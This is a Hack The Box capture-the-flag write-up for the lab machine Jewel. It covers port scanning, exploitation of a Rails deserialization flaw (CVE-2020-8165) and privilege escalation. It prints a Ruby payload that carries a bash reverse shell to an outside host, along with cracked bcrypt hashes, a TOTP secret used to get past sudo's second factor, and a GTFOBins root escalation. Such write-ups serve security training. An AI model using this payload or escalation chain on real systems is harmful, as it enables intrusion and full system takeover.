Hack The Box Write-Up Jewel - 10.10.10.211
Post
Cancel

# Hack The Box Write-Up Jewel - 10.10.10.211

Experience is a jewel, and it need be so, for it is often purchased at an infinite rate.

William Shakespeare

In this post, I’m writing a write-up for the machine Jewel from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills

Jewel is a ‘Medium’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 15 and submitting the root flag you points will be raised by 30.

Foothold

The Nmap port scan had discovered three open ports. The two ports which are interesting are 8000/tcp and 8080/tcp, both ports are servicing a web service. After checking the web services and found in the Gitweb log that the backend is using Rails version 2.1.1. This version has a vulnerability, also known as CVE-2020-8165.

User

After exploiting the vulnerability, I was able to establish a reverse shell as the user bill, and I can directly read the user flag.

Root

The root part was the most interesting part of this machine, IMO. After the enumeration, I had found four bcrypt hashes. John was able to crack the password from the user bill, and the sudo -l command is asking for a verification code. Sudo is protected with second-factor authentication. From the home folder of the user bill, I had found the Google Authenticator file with the Secret. With this secret, I could configure the Google Authenticator for the second-factor verification. The code depends on the system time. After syncing my system time with the time of the box, the second-factor authentication with the provided code from the Google Authenticator works. The user account bill has permission to run gem as sudo. GTFObins was the solution to gain root privileges and read the root flag.

# Machine Info

 Machine Name: Jewel Difficulty: Medium Points: 30 Release Date: 10 Oct 2020 IP: 10.10.10.211 Creator: polarbearer

# Recon

## Port scan with Nmap

As always I start the box with a port scan with Nmap.

 1 ~$nmap -sC -sV -oA ./nmap/10.10.10.211 10.10.10.211 The results.  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-30 21:48 UTC Nmap scan report for 10.10.10.211 Host is up (0.017s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 fd:80:8b:0c:73:93:d6:30:dc:ec:83:55:7c:9f:5d:12 (RSA) | 256 61:99:05:76:54:07:92:ef:ee:34:cf:b7:3e:8a:05:c6 (ECDSA) |_ 256 7c:6d:39:ca:e7:e8:9c:53:65:f7:e2:7e:c7:17:2d:c3 (ED25519) 8000/tcp open http Apache httpd 2.4.38 |_http-generator: gitweb/2.20.1 git/2.20.1 | http-open-proxy: Potentially OPEN proxy. |_Methods supported:CONNECTION |_http-server-header: Apache/2.4.38 (Debian) | http-title: 10.10.10.211 Git |_Requested resource was http://10.10.10.211:8000/gitweb/ 8080/tcp open http nginx 1.14.2 (Phusion Passenger 6.0.6) |_http-server-header: nginx/1.14.2 + Phusion Passenger 6.0.6 |_http-title: BL0G! Service Info: Host: jewel.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 17.59 seconds This machine acts as a webserver. The interesting is the banner on the alternative HTTP port 8080/tcp. Phusion Passenger 6.0.6 and the directory /gitweb is visible. # Enumeration ## Enumeration Webserver I visited the URL http://10.10.10.211:8080 and landed the website BLOG! There is a Sign-Up and login button visible on the right top corner. So, let’s register a user account. After~creating the account and logging in, there is nothing interesting to find. I found some articles and two usernames jennifer and bill. After clicking some around, I switched to the HTTP port, 8000/tcp. I visited the URL http://10.10.10.211:8000 and the page got’s redirected to http://10.10.10.211:8000/gitweb/. I checked the used Gitweb version 2.20.1, which contains several vulnerabilities. I played some around with CVE-2019-19604, a OS command execution vulnerability. But I was not able to get this exploit working. I decided to look further for other attack vectors. After some searching and clicking around on this Gitweb page, I saw that Bill had placed a commit that changed 134 files, On September, 17th 2020. This commit has the name ‘initial commit’. After checking the log of this commit, I found some software versions listed in the contents of the files, like ‘ruby 2.5.5.’ and ‘rails .2.2.1’. After a search on Google, I found that Rails 2.2.1 had a Remote Code Execution (RCE) vulnerability. The description of this vulnerability, according to Rapid7: ‘A deserialization of untrusted data vulnerability exists in rails < 5.2.4.3, rails < 6.0.3.1 that can allow an attacker to unmarshal user-provided objects in MemCacheStore and RedisCacheStore potentially resulting in an RCE.’ # Intrusion ## CVE-2020-8165 After some searching again on Google for a Proof-Of-Concept (PoC), I found one on Github. After carefully reading the payload, I found that this payload has a typo, there is an ‘=‘ missing to define the payload variable.  1 2 3 4 5 6 7 8 9 10 11 ~$ git clone https://github.com/masahiro331/CVE-2020-8165.git git clone https://github.com/masahiro331/CVE-2020-8165.git Cloning into 'CVE-2020-8165'... remote: Enumerating objects: 96, done. remote: Counting objects: 100% (96/96), done. remote: Compressing objects: 100% (74/74), done. remote: Total 96 (delta 13), reused 88 (delta 9), pack-reused 0 Unpacking objects: 100% (96/96), 1.02 MiB | 1.33 MiB/s, done. ~$bundle install --path vendor/bundle ~$ bundle exec rails db:migrate ~$bundle exec rails s Now access the rails console.  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 ~$ sudo bundle exec rails console Running via Spring preloader in process 17770 Loading development environment (Rails 5.2.3) WARNING: This version of ruby is included in macOS for compatibility with legacy software. In future versions of macOS the ruby runtime will not be available by default, and may require you to install an additional package. irb(main):001:0> code = '/bin/bash -c "bash -i >& /dev/tcp/10.10.14.38/4444 0>&1"' irb(main):001:0> erb = ERB.allocate irb(main):001:0> erb.instance_variable_set :@src, code irb(main):001:0> erb.instance_variable_set :@filename, "1" irb(main):001:0> erb.instance_variable_set :@lineno, 1 irb(main):001:0> payload = Marshal.dump(ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result) irb(main):001:0> puts "Payload" irb(main):001:0> irb(main):001:0> require 'uri' irb(main):001:0> puts URI.encode_www_form(payload: payload)

After the last command, I got the payload. This is my payload.

The second step is to put this payload in an HTTP request and sent it to the webserver. Put payload through Burp Suite on the profile update page. The username in the request needs to be replaced with the payload.

Now, I replace my username with the payload and send the payload with the RCE to the webserver.

The last step is going to the homepage, and the server is requesting my updated username with the reverse shell payload and the payload got’s executed.

 1 2 3 4 Connection from 10.10.10.211:59414 bash: cannot set terminal process group (793): Inappropriate ioctl for device bash: no job control in this shell [email protected]:~/blog$The next step is to grab the user flag.  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 [email protected]:~/blog$ ls ls app bd.sql bin config config.ru db Gemfile Gemfile.lock lib log node_modules package.json public Rakefile README.md storage test tmp vendor yarn.lock [email protected]:~/blog$cd /home cd /home [email protected]:/home$ ls ls bill [email protected]:/home$cd bill cd bill cat user.txt cat user.txt b3c76eb0ffdac2b874ffe75d4d6f0191 # Privilege Escalation ## Enumeration First, upgrade the shell and then I can start the enumeration for root. Let’s start the enumeration from the home folder of the user account Bill.  1 2 [email protected]:~/blog$ python3 -c 'import pty; pty.spawn("/bin/bash")' python3 -c 'import pty; pty.spawn("/bin/bash")'

When I run the command sudo -l, I need to fill in a password. I do not have the password so I left the password empty. The response from this box is quite fun. After filling in no password or the wrong password, the box is generating random messages. This what I need to keep in mind. When I have the password of bill, this command can be the next step.

I downloaded linpeas.sh to the machine and after running the script, it has found two password hashes. Let’s try to crack both of them with my little buddy John the Ripper.

 1 2 3 [+] Searching specific hashes inside files - less false positives (limit 70) /var/backups/dump_2020-08-27.sql:$2a$12$sZac9R2VSQYjOcBTTUYy6.Zd.5I02OnmkKnD3zA6MqMrzLKz0jeDO /home/bill/blog/bd.sql:$2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW

The hashes are hashed with a bcrypt [Blowfish 32/64 X3]) hash, I have pasted the hashes in a file called hashes.txt. After more searching, I found another hash in the file /home/bill/blog/bd.sql and from the http://10.10.10.211:8000/gitweb/?p=.git;a=patches file. I gave these hashes to john, and run them against the rockyou.txt wordlist.

 1 2 3 $2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW$2a$12$ik.0o.TGRwMgUmyOR.Djzuyb/hjisgk2vws1xYC/hxw8M1nFk0MQy $2a$12$sZac9R2VSQYjOcBTTUYy6.Zd.5I02OnmkKnD3zA6MqMrzLKz0jeDO$2a$12$QqfetsTSBVxMXpnTR.JfUeJXcJRHv5D5HImL0EHI7OzVomCrqlRxW

After a couple of seconds, I got the password spongebob, after some testing, I found that this is the password for the user account bill.

 1 2 3 4 5 ~$john hashes.txt -wordlist=../../wordlists/rockyou.txt Loaded 4 password hashes with 4 different salts (bcrypt [Blowfish 32/64 X3]) Press 'q' or Ctrl-C to abort, almost any other key for status 0g 0:00:00:35 0% 0g/s 2.425p/s 9.868c/s 9.868C/s naruto..sweety spongebob (?) Now, I can run the sudo -l command, because I have the password.  1 2 3 4 5 [email protected]:~/blog$ sudo -l sudo -l [sudo] password for bill: spongebob Verification code:

Well, that’s interesting. It seems I need another step of verification.

## Enumeration two-step verification

I need to find a way to get into the two-step verification. Most people are using Google Authenticator as second-factor authentication. So, let’s check if I can find something about Google. I checked the home folder of the user account bill and there is a file about the Google Authenticator.

 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 ~$[email protected]:~$ ls -la ls -la total 52 drwxr-xr-x 6 bill bill 4096 Sep 17 14:10 . drwxr-xr-x 3 root root 4096 Aug 26 09:32 .. lrwxrwxrwx 1 bill bill 9 Aug 27 11:26 .bash_history -> /dev/null -rw-r--r-- 1 bill bill 220 Aug 26 09:32 .bash_logout -rw-r--r-- 1 bill bill 3526 Aug 26 09:32 .bashrc drwxr-xr-x 15 bill bill 4096 Nov 5 21:41 blog drwxr-xr-x 3 bill bill 4096 Aug 26 10:33 .gem -rw-r--r-- 1 bill bill 43 Aug 27 10:53 .gitconfig drwx------ 3 bill bill 4096 Nov 5 19:40 .gnupg -r-------- 1 bill bill 56 Aug 28 07:00 .google_authenticator drwxr-xr-x 3 bill bill 4096 Aug 27 10:54 .local -rw-r--r-- 1 bill bill 807 Aug 26 09:32 .profile lrwxrwxrwx 1 bill bill 9 Aug 27 11:26 .rediscli_history -> /dev/null -r-------- 1 bill bill 33 Nov 4 19:54 user.txt -rw-r--r-- 1 bill bill 116 Aug 26 10:43 .yarnrc

I have opened the file .google-authenticator and the secret is visible! With this secret, I’m able to configure the second-factor authentication.

 1 2 3 4 5 cat .google_authenticator cat .google_authenticator 2UQI3R52WFCLE6JTLDCSJYMJH4 " WINDOW_SIZE 17 " TOTP_AUTH

I added the Authenticator by mymindstorm to my FireFox.

After the configuration of the plugin with the Secret, I’m able to get the OTP from Google. I tried the code on the account from the user account bill, with the sudo -l command, but I received an error. Again, with a custom message.

 1 2 3 4 5 6 7 8 sudo -l sudo -l [sudo] password for bill: spongebob Verification code: 699658 Error "Operation not permitted" while writing config I don't wish to know that.

## Own the machine

After doing some research, I found that the verification code get’s calculated by the time of the machine. So, the time of my machine needs to be in sync with the box. The box is using the Europe/London timezone. after setting my machine in that timezone, I was able to enter the verification code correctly.

 1 2 3 4 5 6 7 Matching Defaults entries for bill on jewel: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, insults User bill may run the following commands on jewel: (ALL : ALL) /usr/bin/gem
 Bill has the permissions to run gem as sudo. I know that GTFObins have some nice commands to break out the restricted environments: [gem GTFObins](https://gtfobins.github.io/gtfobins/gem/){:target=”_blank”}.

I ran this commando and was able to read the root flag.

 1 2 3 4 5 sudo gem open -e "/bin/sh -c /bin/sh" rdoc sudo gem open -e "/bin/sh -c /bin/sh" rdoc # cat /root/root.txt cat /root/root.txt 20e32770bb20e703e4149c4690431076

Thanks for reading this write-up! Did you enjoy reading this write-up? Or learned something from it? Please consider spending a respect point: https://app.hackthebox.com/profile/224856.com/profile/224856. Thanks!

Happy Hacking :-)